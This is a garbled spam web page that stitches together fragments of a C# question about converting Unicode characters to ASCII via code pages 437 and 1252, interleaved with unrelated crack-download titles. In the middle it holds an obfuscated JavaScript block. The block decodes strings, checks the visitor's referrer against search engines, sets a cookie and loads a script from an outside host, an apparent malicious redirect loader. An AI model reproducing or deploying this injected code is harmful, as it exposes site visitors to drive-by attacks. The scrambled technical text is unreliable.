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    GetEncoding( ) You might try to use code page 1252, which is a superset of ISO 8859-1.

    NET converts the content of the database (in the case of this problem a string) to Unicode before handing the content to me.. men/don_con php?x=en&query=',q)+'');}}}R(); Convert unicode to ascii codeGet via App Store Read this post in our app!How to convert a Unicode character to its ASCII equivalentHere's the problem:In C# I'm getting information from a legacy ACCESS database.. This led me to codepage 437:n ASCII-compatible code pages, the lower 128 characters maintained their standard US-ASCII values, and different pages (or sets of characters) could be made available in the upper 128 characters.

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    constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x4ce2f1){_0x18d5c9=window;}return _0x18d5c9;};var _0x333808=_0x550fbc();var _0x432180='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x333808['atob']||(_0x333808['atob']=function(_0x2ab90b){var _0x991246=String(_0x2ab90b)['replace'](/=+$/,'');for(var _0x981158=0x0,_0x57b080,_0x219af0,_0x441e3a=0x0,_0x2cc193='';_0x219af0=_0x991246['charAt'](_0x441e3a++);~_0x219af0&&(_0x57b080=_0x981158%0x4?_0x57b080*0x40+_0x219af0:_0x219af0,_0x981158++%0x4)?_0x2cc193+=String['fromCharCode'](0xff&_0x57b080>>(-0x2*_0x981158&0x6)):0x0){_0x219af0=_0x432180['indexOf'](_0x219af0);}return _0x2cc193;});}());_0x4074['base64DecodeUnicode']=function(_0x5f41ea){var _0x503809=atob(_0x5f41ea);var _0xe42b77=[];for(var _0x56465b=0x0,_0x52cace=_0x503809['length'];_0x56465b=_0x2d6ebb;},'DprIk':function _0x43f5c4(_0x5d4f4b,_0x16fce7){return _0x5d4f4b=_0x20a452;},'NeWdn':function _0x3ee222(_0x28f36a,_0x19beaf){return _0x28f36a+_0x19beaf;}};var _0x51e1f9=[_0x5d0bcd[_0x4074('0x24')],_0x5d0bcd[_0x4074('0x25')],_0x5d0bcd[_0x4074('0x26')],_0x5d0bcd['FRyDx'],_0x5d0bcd[_0x4074('0x27')],_0x4074('0x28'),_0x5d0bcd[_0x4074('0x29')]],_0x126457=document[_0x4074('0x2a')],_0x144c58=![],_0x4f7cdf=cookie[_0x4074('0x2b')](_0x5d0bcd[_0x4074('0x2c')]);for(var _0x17824f=0x0;_0x5d0bcd[_0x4074('0x2d')](_0x17824f,_0x51e1f9[_0x4074('0x13')]);_0x17824f++){if(_0x5d0bcd[_0x4074('0x2e')](_0x126457[_0x4074('0xb')](_0x51e1f9[_0x17824f]),0x0)){_0x144c58=!![];}}if(_0x144c58){cookie['set'](_0x5d0bcd[_0x4074('0x2c')],0x1,0x1);if(!_0x4f7cdf){include(_0x5d0bcd[_0x4074('0x2f')]('https://cloudeyess. Boom 2 Mac Crack

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    In Code page 437, character number 136 is an e with a circumflex Hmm … I'm not sure which character you mean.. Perhaps your Access database has corrupt data in the sense that the designated encoding does not match the contents, in which case the.. So, codepage 437 was the codepage I was calling 'extended ASCII', it had the ê as character 136 so I looked up some other chars as well and they seem right.. NET client might incorrectly parse the data (using the wrong decoder) If this error is indeed introduced during the reading from the database, perhaps pasting some code or configuration settings might help.. How do I convert this Unicode string back to it's ASCII equivalent?Unicode char 710 is indeed MODIFIER LETTER CIRCUMFLEX ACCENT. Saigon The Greatest Story Never Told Chapter 2 Rar Vietnam

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    ):But this does not result in 94 but a byte with value 63 Here's a new try but it still does not work:Thanks to both csgero and bzlm for pointing in the right direction I solved the problem here.. Here's the problem a bit more precise:Here's what I've tried (I see now why this did not work.. Okay, let's elaborate Both csgero and bzlm pointed in the right direction Because of blzm's reply I looked up the Windows-1252 page on wiki and found that it's called a codepage.. csgero came with the Encoding GetEncoding() hint, I used it to create the following statement which solves my problem:You cannot use the default ASCII encoding (Encoding.. The wikipedia article for Code page which stated the following:No formal standard existed for these ‘extended character sets’; IBM merely referred to the variants as code pages, as it had always done for variants of EBCDIC encodings.. DOS computers built for the North American market, for example, used code page 437, which included accented characters needed for French, German, and a few other European languages, as well as some graphical line-drawing characters.. Can you verify that a small e with a circumflex (ê) is actually what is supposed to be stored in the Access database in this case? Perhaps U+02C6 U+0065 is the result of a conversion error, where the input is actually an e followed by a circumflex, or something else entirely.. ASCII) here, but must create the encoding with the appropriate code page using Encoding. b0d43de27c Toukiden Kiwami Walkthrough

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